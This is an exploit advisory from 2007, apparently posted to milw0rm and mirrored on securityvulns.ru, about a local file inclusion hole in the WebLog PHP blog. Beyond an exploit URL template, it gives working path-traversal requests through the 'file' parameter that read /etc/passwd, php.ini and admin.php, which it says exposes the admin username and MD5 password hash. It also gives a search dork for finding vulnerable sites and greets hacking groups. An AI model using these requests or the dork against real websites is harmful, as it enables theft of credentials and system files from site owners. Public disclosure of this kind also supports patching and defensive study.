Security Advisory: WebLog (index.php file) Remote File Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Creative Guestbook 1.0 Multiple Remote Vulnerabilities
  McGallery 0.5b Arbitrary File Download Vulnerability
  WBBlog (XSS/SQL) Multiple Remote Vulnerabilities
  Creative Files 1.2 (kommentare.
php) Remote SQL Injection Vulnerabilities

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 17.03.2007
Subject: WebLog (index.php file) Remote File Disclosure Vulnerability

                                                         .-
""""""""-.
                                                        /   Dj7xpl   \
                                                       |              |
                                                       |, .-. .-. ,|
                                                       | )(_o/ \o_)( |
                                                       |/     /\     \|
                                             (@_       (_     ^^     _)
                                        _     ) \_______\__|IIIIII|__/_______________________________
                                       (_)@8@8{}<________|-
\IIIIII/-|________________________________>
                                              )_/        \          /
                                              (@

+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :   http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_f
ive
#   Author     :   Dj7xpl | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+________________________________________________________________________________
_______________________________________+

+________________________________________________________________________________
_______________________________________+
#
#
#   Exploit :   http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :   http://localhost/blog/index.php?show=showarticles&file=../../../..
/windows/php.ini
#               http://localhost/blog/index.php?show=showarticles&file=../../..
/../etc/passwd
#               http://localhost/blog/index.php?show=showarticles&file=..
/admin.php   <<< username&password(md5)
#
#
+________________________________________________________________________________
_______________________________________+

+________________________________________________________________________________
_______________________________________+
#
#
#    Sp Tnx      : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+________________________________________________________________________________
_______________________________________+

# milw0rm.com [2007-03-15]